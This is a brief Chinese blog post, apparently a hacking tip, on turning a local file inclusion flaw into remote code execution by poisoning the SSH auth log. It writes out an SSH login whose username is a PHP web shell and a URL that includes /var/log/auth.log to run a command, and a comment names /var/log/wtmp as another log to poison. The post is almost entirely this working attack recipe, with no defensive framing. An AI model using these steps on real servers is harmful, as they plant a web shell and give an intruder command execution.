LFI SSH日志
in 奇技淫巧 with 2 comments

LFI SSH日志

in 奇技淫巧 with 2 comments

登陆SSH:

ssh '<?php system($_GET[‘c’]); ?>'@192.168.1.105

包含文件:

http://192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ls
Responses
  1. Oringinal sin

    /var/log/auth.log只有ubuntu系有。
    其实对linux,可以包含/var/log/wtmp。一样的效果。有16字符可控,足够了。
    只可以没有x权限,要不然ssrf fastcgi就有意思了。

    Reply
    1. @Oringinal sin

      恩恩,只是一个小tips

      Reply